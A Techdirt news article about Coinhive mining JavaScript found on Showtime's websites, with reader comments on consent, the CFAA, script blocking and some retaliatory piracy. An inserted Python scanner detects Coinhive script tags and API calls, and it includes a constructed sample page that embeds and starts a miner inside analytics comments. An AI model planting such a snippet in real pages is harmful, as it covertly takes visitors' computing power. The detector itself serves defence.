Showtime Won't Explain Why Its Website Was Hijacking User Browsers To Covertly Mine Cryptocurrency
from the whoops-a-daisy dept
Showtime’s websites recently began covertly hijacking user browsers to mine cryptocurrency, and neither Showtime nor its parent company CBS appears interested in explaining how or why it happened. The code in question, a bit of JavaScript dubbed Coinhive, was embedded in two different Showtime domains: Showtime.com and Showtimeanytime.com. When a visitor loaded either domain, their browser was hijacked and their computer was forced to help mine Monero, a new privacy-centric alternative to bitcoin currently valued at around $92 each.
The mining software was first noticed by a Twitter user who discovered the Coinhive miner buried early on in the source code:
@briankrebs https://t.co/fnk275wEj9 has a Cryptocurrency miner in the source code pic.twitter.com/XE80sMRJVe
— SkensNet (@skensnet) September 23, 2017
Users weren’t alerted that this was happening, and visitors reportedly found the mining software utilized up to 80% of a visiting user’s CPU cycles. Such miners can also notably drain battery life for visitors on mobile devices. And as of this writing, Showtime has been completely unwilling to confirm that this occurred, much less explain how the code appeared. The company has refused to respond to numerous requests for comment from a myriad of websites, Techdirt included. The code appeared in the evening of September 23, and had disappeared by the next Monday morning.
It seems relatively unlikely that executives or developers at Showtime thought it would be a good idea to hijack the browsers of potential customers to mine cryptocurrency, leading many to believe that Showtime’s servers were likely hacked by somebody looking to covertly make a little extra money:
“The JavaScript, which appeared on the sites at the start of the weekend and vanished by Monday, sits between HTML comment tags that appear to be an insert from web analytics biz New Relic. Again, it is unlikely that an analytics company would deliberately stash coin-mining scripts onto its customers’ pages, so the code must have come from another source, or was injected by miscreants who had compromised Showtime’s systems.”
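A defender-side check for the embedding pattern described above, added here as an example and not code from the article, from Showtime or from New Relic: it parses page HTML, flags a script loaded from the Coinhive CDN or an inline instantiation of the Coinhive API, and records the nearest HTML comment so an analyst can see which vendor snippet the miner was tucked into. The sample HTML is constructed; the hostname and class name are the publicly documented Coinhive ones, and the site key is a placeholder.

```python
"""Scan page HTML for an embedded Coinhive-style miner (added example)."""
import re
from html.parser import HTMLParser

MINER_HOSTS = ("coinhive.com",)  # miner script CDN, as publicly documented in 2017
# Inline instantiation of the miner API, e.g. new CoinHive.Anonymous('...')
MINER_API_RE = re.compile(r"\bnew\s+CoinHive\.\w+\s*\(", re.I)

class MinerScanner(HTMLParser):
    """Records suspicious <script> tags and remembers the most recent HTML
    comment, so each finding can be tied to the surrounding vendor snippet."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self.last_comment = None
        self._script = None  # buffer for the body of the current <script>

    def handle_comment(self, data):
        self.last_comment = data.strip()

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        self._script = []
        src = dict(attrs).get("src") or ""
        if any(host in src.lower() for host in MINER_HOSTS):
            self.findings.append({"kind": "external", "where": src,
                                  "near_comment": self.last_comment})

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            match = MINER_API_RE.search("".join(self._script))
            if match:
                self.findings.append({"kind": "inline", "where": match.group(0),
                                      "near_comment": self.last_comment})
            self._script = None

def scan_html(html):
    """Return the list of miner findings for one HTML document."""
    scanner = MinerScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings

# CONSTRUCTED sample modelled on the article: a miner wedged between an
# analytics vendor's comment markers. The site key is a placeholder.
SAMPLE_HTML = """<html><head><!-- Begin analytics vendor snippet -->
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>var m = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER'); m.start();</script>
<!-- End analytics vendor snippet --></head><body><p>Watch now</p></body></html>"""
```

Call `scan_html(SAMPLE_HTML)` to see both findings; on a live site you would feed it the HTML fetched from the server, and a page that is clean returns an empty list.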
That said, it’s not impossible that Showtime was running an experiment. Cryptocurrency miners have been making headlines in recent weeks after The Pirate Bay was caught also covertly using Coinhive to hijack visitor browsers to make extra bank. Coinhive only just launched September 14, advertising itself as a creative alternative to the traditional advertising model. But after users over at the Pirate Bay subreddit discovered the practice and began to complain, the website was forced to pull the software from its code and issued a relatively flimsy mea culpa:
“As you may have noticed we are testing a Monero javascript miner. This is only a test. We really want to get rid of all the ads. But we also need enough money to keep the site running.”
Except covertly hijacking a browser with glorified malware obviously isn’t a great way of “keeping a site running,” especially if websites rushing to embrace Coinhive refuse to let users opt out — much less inform them this is even happening. Not surprisingly, the recent rise in such stealth cryptocurrency miners has resulted in Adblock Plus moving to help block such hijacks. Malwarebytes analyst Jérôme Segura warns in a blog post that some websites appear unsurprisingly intent on “pushing the limits towards a really bad user experience”:
“Gaming and video sites typically are more resource intensive, so it seems to make little sense to run a miner at the same time without having a noted impact. Having said that, many people who consume copyrighted content are perhaps less likely to complain about an under par user experience. The question at this point is: How far can publishers push the limits towards a really bad user experience? You may be surprised that for many, this is not really a problem at all and that double dipping is, in fact, a fairly common practice.”
Again, there are creative alternatives to advertising, and then there’s just being an asshole. Hijacking a visitor’s browser, CPU and electricity to mine cryptocurrency without informing them — or letting them opt out — sits firmly in the latter category.
Filed Under: coinhive, hijacking, javascript, monero, showtime
Companies: cbs, showtime
Comments on “Showtime Won't Explain Why Its Website Was Hijacking User Browsers To Covertly Mine Cryptocurrency”
Interesting idea though
Sadly the bad actors are going to kill all chances of it working, but does make me wonder.
What if you ran a site and just had clean banner at the top politely asking people to please run the miner to support you? It could actually be a good alternative to ads… So long as it is done clearly upfront and Opt-in only.
Re: Interesting idea though
Agree, but it is a sure sign of how these assholes operate.
If it is not shady, spying, controlling, or domineering… they are not interested!
Re: Interesting idea though
Hey guys, you could do this. I’d spend electricity on you.
Re: Re: Interesting idea though
I’d gladly let them coopt my CPU for cryptocurrency mining if it meant I didn’t have to watch commercials.
But they’d have to inform me upfront, provide an alternative, and the experience has to be positive (none of this buffering and dropping connections crap).
Re: Interesting idea though
That is an interesting idea. Can these miners limit the amount of CPU usage they use? Or let the user determine how much of the CPU is used?
I’d like to see the math on that and compare it to ad revenue. Would it be more? Less? Equal to?
I loath ads with every fiber of my being. But I would definitely volunteer some CPU time during my visits.
Re: Re: Interesting idea though
It’d be interesting to have a revenue scheme that involved letting a miner generate credit. Run our particular miner for X amount of time and pick a season to view. It definitely blurs the lines of currency, but I think it would be an interesting proposition.
Re: Interesting idea though
This was the idea behind Tidbit, but they were shut down.
https://venturebeat.com/2014/02/12/new-jersey-slaps-mit-bitcoin-hackers-with-subpoena-and-theyre-fighting-back/
Re: Re: Interesting idea though
Rightly so, same should be done to showtime, but the problem is that tidbit is in the wrong class of humans.
Any website that runs code that performs work to consume resources at the expense of the consumer, especially without any notice/permission, is against the CFAA.
As a user I expect to pay for the electricity and my costs to connect to the infrastructure and to consume bandwidth to display/interact with the services that a website is offering. The moment they start consuming any of my resources to make them money without first obtaining explicit permission then they are criminally liable for every watt my CPU consumes crunching their code!
I am okay with this replacing ads, but only as long as I am notified that my machine is now being used like this and given a choice to participate or not!
It should be illegal for a website to require someone to allow their computer to become a botnet, even if temporary, to consume a website!
Re: Re: Re: Interesting idea though
This has the makings of a very entertaining slippery slope. Suppose a website could lay out its content properly, as a static page on the server, which is then sent verbatim to clients; or they could indulge their JavaScript addiction and make the client do all the work laying out the page. The latter will be slightly more CPU efficient for the server (although globally much less efficient since each client would perform the work independently, rather than asking the server to do it once), thus saving them money by requiring the client to perform extra work to use the page. Frequently, such client-side rendered pages are at best equivalent, and usually far worse, user experience than doing it properly on the server (hence satisfying your "at the expense of the consumer"). Would that rise to a CFAA claim under your standard? It feels like it shouldn’t, but it’d be greatly entertaining if it did, because then most Javascript addicted sites could be chased for CFAA. 😀
Re: Re: Re:2 Interesting idea though
All modern web frameworks that work as single page apps (Ember, React, Angular) do just what is being talked about. They render the HTML once, and then only send JSON data blocks back from the server and the browser/JS does the unpacking and processing and re-rendering.
If this is a CFAA violation (which I highly doubt), then a large percentage (probably 70+% of companies) are in violation.
BTW, “asking the server to do it once” is mostly incorrect except on the simplest web pages because injecting any amount of personalization into a page requires the server to render the page for each user.
Re: Re: Re:3 Interesting idea though
Your points are valid wrt any actions initiated by the user … however it appears that the article is discussing other non user initiated activity performed upon user’s machine without their knowledge/consent.
What would happen if the unnecessary activity initiated by the website visited by a user who is not aware of said activity … were to be found illegal? Who is responsible? How does said user defend against this?
Re: Re: Re:3 Interesting idea though
“If this is a CFAA violation (which I highly doubt), then a large percentage (probably 70+% of companies) are in violation.”
Remember, CFAA explicitly states that any usage of a computer that gains access without authorization or attempts to perform a task that exceeds current authorization is abuse.
A website running code to perform its function for serving up content is legit for the obvious reasons. However, the point where the code is now executing something that is “not useful” to that purpose means they exceeded authorization.
Just visiting a page is NOT authorization to just run any code on the visiting machine.
I think the problem here is that once again, we allow companies too much latitude in what they do, just throwing the doors wide open until the abuse is TOO obvious to the point where pretzel logic cannot defend it. This is what created the problem of IoT vulnerability.
Imagine if a store asked all of its customers to process a mathematical equation when they enter the door or face getting kicked out. The more we allow this to continue, the more slippery that slope gets.
Re: Re: Re:3 Interesting idea though
Actually, my experience has been that they render the HTML exactly zero times, then send a blob of Javascript to the client to construct the page. That’s what causes them to be so utterly broken for users who wisely block Javascript. If they did it right, the Javascript would be a progressive enhancement on top of an already usable page. Most sites instead do it dead wrong and make the page totally unusable unless you pull in untrusted scripts from half a dozen different servers.
Personally, I never authorize any site I visit to run Javascript on my computer. Under the frequently twisted interpretation of the CFAA, since I don’t want it to happen, and yet it happens, it must be a CFAA violation. 😉
I know. I can dream though.
Sure, personalization requires customization. That’s obvious. But how often are personalized pages actually necessary when viewing content that is functionally identical across all users (e.g. listing of current news or thread titles in a forum)? There are way too many sites that have decided that everything that could possibly be personalized must be, whether or not it makes any sense.
Re: Re: Re: Interesting idea though
It IS.
Re: Interesting idea though
No.
“We’ve turned this on guys, please do it” is no less acceptable than “….”
That’s a “please help us fix business model problems and oh give us more $$”
Re: Interesting idea though
…I don’t know about you, but I keep literally 10+ tabs open at a time.
What would happen if all 10 of those sites tried to make my computer mine crypto-currency for them?
Even the best computers would probably choke and crash under that onslaught.
Or the computer’s anti-virus would start alerting the user like crazy that someone’s trying to inject malware on your computer.
Hey Mike Masnick – are you still living with javascript disabled in your browsers? Wondering if that is even possible in today’s .js driven web world. Because more and more javascript seems like a security weakness.
Re: Re:
I’m not Mike Masnick, but I’ve blocked Javascript in my browsers for many years now — only allowing it permanently from a few dozen sites, only allowing it temporarily on a limited basis. Yes, this sometimes breaks things, and yes, there are a lot of sites that pull Javascript from WAY too many sources (Techdirt appears to be using 16) but rampant abuse has made it necessary — just as it’s become necessary to block all advertising.
Re: Re: Re:
Seconded
JS is a well known vector for malware, many times embedded in ads.
Re: Re: Re: Re:
ditto 3rd
Re: Re: Re:2 Re:
ditto.
Been using javascript blocking for years. In the early days I’d have JS disabled entirely in the browser, then used addons that added a button to disable/enable it, then later ones that allowed per-site, then still later the more advanced ones like noscript, policeman, umatrix, and so on that allow blocking not just on the site, but subdomains, cross-site, and so on.
Re: Re:
I think I’ve seen Mike link to sites that don’t work without JS. He must have it enabled. But I don’t and Techdirt still works. Lots of sites haven’t tested obviously–sometimes the pages are just blank or "links" don’t work, sometimes you get an "enable javascript" message (don’t–it only encourages them).
Re: Re: Re:
“sometimes the pages are just blank”
If you’re using Firefox, oftentimes you can click the book icon next to the URL bar and magically the words appear.
Re: Re: Re: Re:
Yeah, turning off stylesheets works too sometimes. (View / Page Style / No Style) I still don’t know why anyone would set their page to be invisible by default.
I'd love to see the disclaimer for this in the future...
“This website uses embedded crypto-currency mining software that borrows from your computer’s processing power. Please be aware that by visiting this website you agree to help us generate swaths of grey market currency while driving up your energy consumption, reducing the responsiveness of all your other programs, and possibly hurting your net bandwidth usage.
Also something something tracking cookies
[[I Accept]]”
What if this was done to a user....
….who is operating in a legal jurisdiction that has banned cryptocurrencies? (In other words, what if forcing this on a user caused them to commit a crime?)
Re: What if this was done to a user....
Has there been anywhere that has banned mining it? I only know places that have banned using it.
Re: Re: What if this was done to a user....
Well isn’t banning the use of it kind of banning the mining of it by default?
If you’re mining it obviously you intend on ‘using’ it in some way when you sell it/spend it later.
Sounds like theft of service to me, wonder if the DA or whomever is interested in prosecuting these scumbuckets.
Even more the reason to just torrent the latest Star Trek and anything else made by CBS.
If they’re going to abuse technology to steal from us, what’s wrong with us doing it to them?
Re: Re:
I just keep thinking, if I pirate Star Trek does that make me a space pirate? I’m just going to pretend it does because it is awesome and go watch me some Star Trek.
The real question is why are you letting these sites run proprietary scripts on your computer?
I have traced back a lot of this type of activity to ads on web pages that are served by ad networks. A telephone company in India would set off botnet alerts on our network whenever any one of our employees went there. The alerts were for the browser trying to reach coinbase servers once the ad loaded up and started the mining process.
I actually think it is a great idea. But definitely has to be permission based. Start them on a regular ad-full experience and then offer the ad-free version for 20% of your CPU/GPU.
Oh look…Another good use for the NoScript browser Addon. Also, a good reason to NEVER leave a browser open on your computer. You have no idea what’s running “Behind the scenes”.
Get used to it
Tim Berners Lee recently enabled corporations to do this without you being allowed to find out..
It is called EME in combination with DMCA 1201. See https://boingboing.net/2017/09/18/antifeatures-for-all.html
Once the corporate overlords understand the process it will be everywhere.
Maybe then there will be some political pushback.
Re: Get used to it
Should I keep copies of old browsers?
All along you are saying “the legacy industry should learn from piracy”. Now they do, and you are upset.
Who started this issue recently? The Pirate Bay. Didn’t read any outraged comments then, even when they were running a miner that would knock your cpu usage to 100%.
Ahh, the double standards!
Re: Re:
All along you are saying "the legacy industry should learn from piracy". Now they do, and you are upset.
A statement as stupid as ‘You were complaining that the restaurant didn’t have good food, and now that they’ve taken to adding a $20 charge to the bill because screw you you’re upset?’
Or how about ‘People were complaining that movies were too expensive, and now that they’ve decided to just download them for free you’re upset’, would you accept that as valid?
Assuming it was done by the ones running the site itself(possible, and their refusal to explain anything certainly isn’t helping) then ‘Ads aren’t bringing in as much, let’s hijack our visitor’s system resources‘ is not a valid response, whereas being upset about a site serving up malware most certainly is.
Whether or not The Pirate Bay did something similar is besides the point, it wasn’t acceptable then, and it’s not acceptable now, so once again your attempt at a ‘Gotcha’ falls flat.
Re: Re:
But the DRM that fucks over your computer from the CD you purchased legally is somehow hunky-dory to you…
Let me make a little prediction that someone is going to hang by their testicles for this.
Because they can. That’s why corruption, spying, etc. exists in the first place.